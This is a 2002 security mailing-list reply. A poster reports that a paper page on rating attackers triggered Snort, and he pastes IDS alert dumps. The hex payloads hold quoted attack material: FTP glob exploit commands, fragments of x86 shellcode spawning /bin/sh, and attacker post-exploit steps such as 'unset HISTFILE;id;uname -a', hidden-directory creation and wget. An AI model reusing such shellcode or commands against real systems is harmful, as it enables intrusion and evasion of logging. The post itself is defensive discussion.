[Dshield] Rating Attackers

John Sage jsage at finchhaven.com
Fri Aug 2 08:48:04 GMT 2002


umm..

On Tue, Jul 30, 2002 at 08:59:33PM -0400, Toby Miller wrote:
> All,
> Here's the scoop. I have come up with a model to help rate attackers. I want
> this model to eventually profile attackers but we need to take one step at a
> time. This model is nowhere near done and I need the community's help.
> Please read the paper and if you have any comments please send them to me.
> The link is http://www.incidents.org/detect/rating.html.
> 
> 
> 									Thanks,

Not to pick, but that web page sets off snort, big time. Freaked the
sh*t out of me until I figured what was going on, since I first saw
the alert out on my firewall box, and the destination port says that
the packet contents were getting through into one of my interior
boxes...

After I calm back down, I might actually *read* the page :-/


Generated by ACID v0.9.6b21 on Fri August 02, 2002 01:37:59

------------------------------------------------------------------------------
#(312 - 509) [2002-08-02 01:28:26]  ATTACK RESPONSES id check returned root
IPv4: 63.100.47.45 -> 12.82.128.175
      hlen=5 TOS=0 dlen=1500 ID=27816 flags=0 offset=0 TTL=49 chksum=56289
TCP:  port=80 -> dport: 61328  flags=***A**** seq=2179452434
      ack=1695738445 off=8 res=0 win=7504 urp=0 chksum=856
      Options:
       #1 - NOP len=0
       #2 - NOP len=0
       #3 - TS len=10 data=106616AB061AAE39
Payload:  length = 1448

000 : 2F 0D 0A 33 35 30 20 46 69 6C 65 20 65 78 69 73   /..350 File exis
010 : 74 73 2C 20 72 65 61 64 79 20 66 6F 72 20 64 65   ts, ready for de
020 : 73 74 69 6E 61 74 69 6F 6E 20 6E 61 6D 65 0D 0A   stination name..
030 : 3C 2F 70 72 65 3E 0D 0A 0D 0A 3C 68 34 3E 34 29   </pre>....<h4>4)
040 : 20 41 74 74 61 63 6B 65 72 20 62 65 67 69 6E 73    Attacker begins
050 : 20 74 6F 20 67 6C 6F 62 3A 3C 2F 68 34 3E 0D 0A    to glob:</h4>..
060 : 0D 0A 3C 70 72 65 3E 0D 0A 43 57 44 20 30 30 30   ..<pre>..CWD 000
070 : 30 30 30 30 30 30 0D 0A 66 61 65 0D 0A 30 30 30   000000..fae..000
080 : 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30   0000000000000000
090 : 28 63 75 74 20 66 6F 72 20 70 75 62 6C 69 63 61   (cut for publica
0a0 : 74 69 6F 6E 29 0D 0A 43 57 44 20 7E 2F 7B 2E 2C   tion)..CWD ~/{.,
0b0 : 2E 2C 2E 2C 2E 7D 0D 0A 32 35 30 20 43 57 44 20   .,.,.}..250 CWD 
0c0 : 63 6F 6D 6D 61 6E 64 20 73 75 63 63 65 73 73 66   command successf
0d0 : 75 6C 2E 0D 0A 43 57 44 20 2E 0D 0A 32 35 30 20   ul...CWD ...250 
0e0 : 43 57 44 20 63 6F 6D 6D 61 6E 64 20 73 75 63 63   CWD command succ
0f0 : 65 73 73 66 75 6C 2E 0D 0A 52 4E 46 52 20 2E 2F   essful...RNFR ./
100 : 2E 2F 2E 2F 2E 2F 2E 2F 2E 2F 2E 2F 2E 2F 2E 0D   ./././././././..
110 : 0A 33 35 30 20 46 69 6C 65 20 65 78 69 73 74 73   .350 File exists
120 : 2C 20 72 65 61 64 79 20 66 6F 72 20 64 65 73 74   , ready for dest
130 : 69 6E 61 74 69 6F 6E 20 6E 61 6D 65 0D 0A 43 57   ination name..CW
140 : 44 20 37 33 35 30 37 33 0D 0A 35 35 30 20 37 33   D 735073..550 73
<snip>

------------------------------------------------------------------------------
#(312 - 510) [2002-08-02 01:28:28]  ATTACK RESPONSES id check returned root
IPv4: 63.100.47.45 -> 12.82.128.175
      hlen=5 TOS=0 dlen=1500 ID=27818 flags=0 offset=0 TTL=49 chksum=56287
TCP:  port=80 -> dport: 61328  flags=***A**** seq=2179453882
      ack=1695738445 off=8 res=0 win=7504 urp=0 chksum=49199
      Options:
       #1 - NOP len=0
       #2 - NOP len=0
       #3 - TS len=10 data=1066175F061AAEED
Payload:  length = 1448

000 : B0 46 33 C9 CD 80 6A 54 8B DC B0 27 B1 ED CD 80   .F3...jT...'....
010 : B0 3D CD 80 52 B1 10 68 2F 44 E2 F8 8B DC B0 3D   .=..R..h/D.....=
020 : CD 80 58 6A 54 6A 28 58 CD 80 6A 0D 0A 58 99 52   ..XjTj(X..j..X.R
030 : 68 6E 2F 73 68 68 2F 2F 62 69 89 E3 52 53 89 E1   hn/shh//bi..RS..
040 : CD 80 E1 CD 80 75 6E 73 65 74 20 48 49 53 54 46   .....unset HISTF
050 : 49 4C 45 3B 69 64 3B 75 6E 61 6D 65 20 2D 61 3B   ILE;id;uname -a;
060 : 0D 0A 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69   ..uid=0(root) gi
070 : 64 3D 30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73   d=0(root) groups
080 : 3D 35 30 28 66 74 70 29 0D 0A 4C 69 6E 75 78 20   =50(ftp)..Linux 
090 : 61 6C 6C 69 67 61 74 6F 72 31 32 20 32 2E 34 2E   alligator12 2.4.
0a0 : 37 2D 31 30 20 23 31 20 54 68 75 20 53 65 70 20   7-10 #1 Thu Sep 
0b0 : 36 20 31 37 3A 32 31 3A 32 38 20 45 44 54 20 32   6 17:21:28 EDT 2
0c0 : 30 30 31 20 69 35 38 36 20 75 6E 6B 6E 6F 77 6E   001 i586 unknown
0d0 : 0D 0A 6D 6B 64 69 72 20 2F 75 73 72 2F 2E 73 6E   ..mkdir /usr/.sn
0e0 : 6D 70 0D 0A 63 64 20 2F 75 73 72 2F 2E 73 6E 6D   mp..cd /usr/.snm
0f0 : 70 0D 0A 77 67 65 74 0D 0A 77 67 65 74 3A 20 6D   p..wget..wget: m
<snip>

------------------------------------------------------------------------------
#(312 - 511) [2002-08-02 01:28:30]  ATTACK RESPONSES id check returned root
IPv4: 63.100.47.45 -> 12.82.128.175
      hlen=5 TOS=0 dlen=1500 ID=27822 flags=0 offset=0 TTL=49 chksum=56283
TCP:  port=80 -> dport: 61328  flags=***A**** seq=2179453882
      ack=1695738445 off=8 res=0 win=7504 urp=0 chksum=48929
      Options:
       #1 - NOP len=0
       #2 - NOP len=0
       #3 - TS len=10 data=106617E6061AAF74
Payload:  length = 1448

000 : B0 46 33 C9 CD 80 6A 54 8B DC B0 27 B1 ED CD 80   .F3...jT...'....
010 : B0 3D CD 80 52 B1 10 68 2F 44 E2 F8 8B DC B0 3D   .=..R..h/D.....=
020 : CD 80 58 6A 54 6A 28 58 CD 80 6A 0D 0A 58 99 52   ..XjTj(X..j..X.R
030 : 68 6E 2F 73 68 68 2F 2F 62 69 89 E3 52 53 89 E1   hn/shh//bi..RS..
040 : CD 80 E1 CD 80 75 6E 73 65 74 20 48 49 53 54 46   .....unset HISTF
050 : 49 4C 45 3B 69 64 3B 75 6E 61 6D 65 20 2D 61 3B   ILE;id;uname -a;
060 : 0D 0A 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69   ..uid=0(root) gi
070 : 64 3D 30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73   d=0(root) groups
080 : 3D 35 30 28 66 74 70 29 0D 0A 4C 69 6E 75 78 20   =50(ftp)..Linux 
090 : 61 6C 6C 69 67 61 74 6F 72 31 32 20 32 2E 34 2E   alligator12 2.4.
0a0 : 37 2D 31 30 20 23 31 20 54 68 75 20 53 65 70 20   7-10 #1 Thu Sep 
0b0 : 36 20 31 37 3A 32 31 3A 32 38 20 45 44 54 20 32   6 17:21:28 EDT 2

<snip>




- John
-- 
Most people don't type their own logfiles;  but, what do I care?

PGP key:     http://www.finchhaven.com/pages/gpg_pubkey.html
Fingerprint: C493 9F26 05A9 6497 9800  4EF6 5FC8 F23D 35A4 F705




More information about the list mailing list